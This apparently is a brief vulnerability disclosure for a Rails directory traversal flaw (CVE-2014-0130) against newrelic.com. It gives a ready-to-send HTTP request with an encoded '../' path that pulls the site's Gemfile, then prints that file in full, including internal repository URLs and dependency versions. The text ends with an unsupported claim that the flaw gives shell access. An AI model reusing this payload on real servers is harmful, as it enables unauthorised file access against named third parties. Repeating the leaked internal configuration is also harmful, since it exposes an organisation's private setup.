New Relic: newrelic.com rails directory traversal vuln

details:

https://github.com/omarkurt/cve-2014-0130

POC:
GET /devops/%5c%2e%2e%2f%5c%2e%2e%2f%5c%2e%2e%2fGemfile HTTP/1.1
Cookie:
Host: newrelic.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

Response:
source ‘https://rubygems.org’ source ‘https://[email protected]/newrelic/’ gem ‘rails’, ‘3.2.18’ gem ‘haml’ gem ‘newrelic_rpm’, ‘3.9.5.251’ gem ‘ignore_whitehat_transactions’ gem ‘jquery-rails’, ‘2.3.0’ gem ‘jquery-ui-rails’ gem ‘fancybox-rails’ gem ‘masonry-rails’ #gem ‘partner-api’, :git => ‘[email protected]:newrelic/partner_api.git’, :branch => “v1.1.0” gem ‘curb’, ‘~> 0.8.4’ gem ‘unicorn’ gem ‘mysql2’, ‘~> 0.3.11’ gem ‘papers’ gem ‘httparty’ gem ‘insights_event’, ‘~> 2.0.0’ gem ‘dalli’ gem ‘savon’, ‘~>0.9.1’ gem “activeadmin”, ‘0.6.0’ gem ‘rack-ssl-enforcer’ gem ‘rack-attack’, ‘~> 4.3.0’ gem ‘dynamic_sitemaps’, ‘1.0.8’ gem ‘active_admin_importable’ gem ‘rdiscount’ gem ‘utf8-cleaner’ gem ‘rack-cors’, require: ‘rack/cors’ gem ‘tzinfo’, ‘0.3.37’ gem ‘prismic.io’, ‘~> 1.3.0’, require: ‘prismic’ gem ‘rack-rewrite’ gem ‘guard_corgi’, ‘~> 2.0.1’ gem ‘faraday’ gem ‘uuid’ gem ‘analytics-ruby’, ‘~> 2.0.0’, require: ‘segment/analytics’ gem ‘google_drive’ gem ‘status_info’, ‘~> 0.1.5’ group :deployment do gem ‘centurion’ end group :development, :test, :www_test do gem ‘ci_reporter’, ‘~> 1.8.4’ gem ‘selenium-webdriver’, ‘~>2.29’ gem ‘rspec’, ‘~>2.12.0’ gem ‘rspec-core’, ‘~>2.12.0’ gem ‘rspec-expectations’, ‘~>2.12.0’ gem ‘rspec-mocks’, ‘~>2.12.0’ gem ‘rspec-rails’, ‘~>2.12.0’ gem ‘simplecov’ gem ‘capybara’ gem ‘mocha’, :require => ‘mocha/api’ # the require gets rid of the annoying mocha deprecation notices gem ‘shoulda’ end group :test do gem ‘vcr’ gem ‘webmock’ gem ‘sauce’ gem ‘sauce-connect’ gem ‘parallel_tests’ end group :development, :local_development do #gem ‘debugger’ gem ‘pry’ gem ‘pry-nav’ gem ‘guard’, ‘~> 1.8.0’ gem ‘guard-rspec’ gem ‘guard-test’ gem ‘guard-spork’ gem ‘growl’ gem ‘rb-fsevent’ #, :require => false if RUBY_PLATFORM =~ /darwin/i gem ‘spork-rails’ gem ‘better_errors’, ‘~> 0.8.0’ gem ‘binding_of_caller’ # this makes better_errors even better gem ‘ruby-prof’ end group :gooddata_sync, :local_gooddata_sync do gem ‘dropbox-sdk’ gem ‘rubyzip’ end # Gems used only for assets and not required # in production environments by default. group :assets do gem ‘sass-rails’, ‘~> 3.2.6’ gem ‘compass-rails’, ‘~> 1.1.6’ gem ‘coffee-rails’, ‘~> 3.2.1’ gem ‘execjs’ gem ‘turbo-sprockets-rails3’ # See https://github.com/sstephenson/execjs#readme for more supported runtimes gem ‘libv8’, ‘~> 3.16.14.3’ gem ‘therubyracer’, ‘~> 0.12.0’, :platforms => :ruby gem ‘uglifier’, ‘>= 1.0.3’ gem ‘bourbon’ gem ‘neat’ end

It can cause a remote access to the server shell.